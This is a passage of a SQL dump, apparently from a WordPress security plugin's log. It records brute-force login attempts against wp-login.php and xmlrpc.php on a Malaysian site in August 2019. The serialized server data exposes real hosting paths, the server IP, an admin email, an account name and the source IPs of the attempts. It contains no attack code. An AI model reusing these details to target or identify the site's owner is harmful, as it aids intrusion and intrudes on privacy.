empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.252.161.15\";s:11:\"REMOTE_PORT\";s:5:\"39028\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNPhroUwst7QvA2tJFKBwAAAUw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566789511.0421\";s:12:\"REQUEST_TIME\";s:10:\"1566789511\";}}','notice','2019-08-26 03:18:32','2019-08-26 03:18:31',17684992,19175520,'https://bintara.com.my/wp-login.php',1,0,'89.252.161.15'),(23013,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.252.161.15\";s:11:\"REMOTE_PORT\";s:5:\"40120\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNPjboUwst7QvA2tJFKDgAAAVQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566789517.2028\";s:12:\"REQUEST_TIME\";s:10:\"1566789517\";}}','notice','2019-08-26 03:18:38','2019-08-26 03:18:37',18200424,19499904,'https://bintara.com.my/xmlrpc.php',1,0,'89.252.161.15'),(23014,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.134.248.235\";s:11:\"REMOTE_PORT\";s:5:\"50522\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNP5rLuw7edOKpgf7BrQgAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566789606.2657\";s:12:\"REQUEST_TIME\";s:10:\"1566789606\";}}','notice','2019-08-26 03:20:08','2019-08-26 03:20:06',17684944,19173656,'https://bintara.com.my/wp-login.php',1,0,'91.134.248.235'),(23015,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"181.118.146.67\";s:11:\"REMOTE_PORT\";s:5:\"50130\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNTKLoUwst7QvA2tJFNbAAAAUA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566790440.5727\";s:12:\"REQUEST_TIME\";s:10:\"1566790440\";}}','notice','2019-08-26 03:34:02','2019-08-26 03:34:00',17683320,19174512,'https://bintara.com.my/wp-login.php',1,0,'181.118.146.67'),(23016,0,'brute_force','invalid-login::username-1234','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"1234\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"181.118.146.67\";s:11:\"REMOTE_PORT\";s:5:\"50656\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNTK0lLQKVpx7Mms7u5jwAAAdE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566790444.0121\";s:12:\"REQUEST_TIME\";s:10:\"1566790444\";}}','notice','2019-08-26 03:34:06','2019-08-26 03:34:04',18200600,19500544,'https://bintara.com.my/xmlrpc.php',1,0,'181.118.146.67'),(23017,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"3.1.251.35\";s:11:\"REMOTE_PORT\";s:5:\"37436\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNVVElLQKVpx7Mms7u57QAAAcw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566790996.8933\";s:12:\"REQUEST_TIME\";s:10:\"1566790996\";}}','notice','2019-08-26 03:43:18','2019-08-26 03:43:17',17684016,19174304,'https://bintara.com.my/wp-login.php',1,0,'3.1.251.35'),(23018,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"3.1.251.35\";s:11:\"REMOTE_PORT\";s:5:\"37826\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNVVzzAXRCh@i15RK0rSQAAAM0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566790999.1064\";s:12:\"REQUEST_TIME\";s:10:\"1566790999\";}}','notice','2019-08-26 03:43:20','2019-08-26 03:43:19',18199952,19500184,'https://bintara.com.my/xmlrpc.php',1,0,'3.1.251.35'),(23019,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"206.189.51.28\";s:11:\"REMOTE_PORT\";s:5:\"34440\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNWaDzAXRCh@i15RK0rawAAANg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566791272.2065\";s:12:\"REQUEST_TIME\";s:10:\"1566791272\";}}','notice','2019-08-26 03:47:53','2019-08-26 03:47:52',17682264,19173776,'https://bintara.com.my/wp-login.php',1,0,'206.189.51.28'),(23020,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.217.198\";s:11:\"REMOTE_PORT\";s:5:\"57116\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNXi0lLQKVpx7Mms7u6YwAAAco\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566791563.1324\";s:12:\"REQUEST_TIME\";s:10:\"1566791563\";}}','notice','2019-08-26 03:52:44','2019-08-26 03:52:43',17684304,19175576,'https://bintara.com.my/wp-login.php',1,0,'68.183.217.198'),(23021,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 